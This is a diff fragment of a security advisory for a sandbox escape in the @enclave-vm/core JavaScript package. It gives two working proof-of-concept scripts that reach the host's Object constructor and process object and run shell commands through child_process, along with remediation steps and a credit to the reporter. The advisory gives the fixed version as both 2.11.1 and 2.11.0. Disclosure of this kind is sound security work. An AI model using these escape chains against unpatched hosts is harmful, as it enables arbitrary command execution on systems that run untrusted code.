+ "details": "## Summary\n\nIt is possible to escape the security boundraries set by `@enclave-vm/core`, which can be used to achieve remote code execution (RCE).\n\nThe issue has been fixed in version **2.11.1**.\n\n---\n\n## Details\n\nIt is possible to obtain the native `Object` constructor (instead of the `SafeObject` wrapper). This can be used to get retrieve property descriptors via `Object.getOwnPropertyDescriptors`, allowing access to properties otherwise restricted by the sandbox.\n\nWhen a memory limit is set (which is the default), `__host_memory_track__`, a host object, can be used to escape via the host function constructor.\n\nWhen this is not the case, a host reference can be obtained via Node's `nodejs.util.inspect.custom` symbol (which can be triggered, for example, through `console.log`).\n\n---\n\n## Proof of Concept\n\n### PoC 1\n\n```js\nconst { Enclave } = require(\"@enclave-vm/core\");\n\nconst enclave = new Enclave({\n securityLevel: \"SECURE\",\n toolHandler: () => {},\n});\n\nconst result = enclave.run(`\nconst op = {}[[\"__proto__\"]];\nconst ho = op[[\"constructor\"]];\n\nconst glob = ho.getOwnPropertyDescriptors(this);\n\nreturn {\n res: glob.__host_memory_track__.value[[\"constructor\"]](\"return process\")()\n .getBuiltinModule(\"child_process\")\n .execSync(\"id\")\n .toString()\n .split(\"\\\\n\"),\n};`);\n\nresult\n .then((v) => console.log(\"success\", v))\n .catch((e) => console.log(\"failure\", e));\n```\n\n---\n\n### PoC 2\n\n```js\nconst { Enclave } = require(\"@enclave-vm/core\");\n\nconst enclave = new Enclave({\n securityLevel: \"STRICT\",\n toolHandler: () => {},\n memoryLimit: 0,\n});\n\nconst result = enclave.run(`\nconst op = {}[['__proto__']];\nconst ho = op[['constructor']];\n\nconst glob = ho.getOwnPropertyDescriptors(this);\n\nconst sym = glob[['Symbol']].value.for('nodejs.util.inspect.custom');\n\nlet result;\nconst obj = {\n [sym]: (depth, option, inspect) => {\n result = inspect[['constructor']]\n [['constructor']]('return process')()\n .getBuiltinModule('child_process')\n .execSync('id')\n .toString();\n },\n};\n\nglob.__safe_console.value.log(obj);\nreturn { result }\n`);\n\nresult\n .then((v) => console.log(\"success\", v))\n .catch((e) => console.log(\"failure\", e));\n```\n\n---\n\n## Impact\n\nThis vulnerability allows a malicious actor executing untrusted code inside an Enclave instance to escape the sandbox and execute arbitrary commands on the host system.\n\nThis constitutes **Remote Code Execution (RCE)** and should be considered **Critical severity**.\n\n---\n\n## Remediation\n\nThe issue has been fixed in **v2.11.0** with the following hardening measures:\n\n* Strengthened intrinsic object isolation\n* Improved console isolation\n* Hardened host callback exposure paths\n* Closed AST validation gaps\n* Added additional defensive checks around constructor access and prototype traversal\n\nAll known escape paths demonstrated in the PoCs are now blocked.\n\nUsers are strongly advised to upgrade to **v2.11.1** or later immediately.\n\n---\n\n## Credit\n\nEnclave would like to thank **@c0rydoras** for responsibly reporting this issue and for providing detailed proof-of-concept examples.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments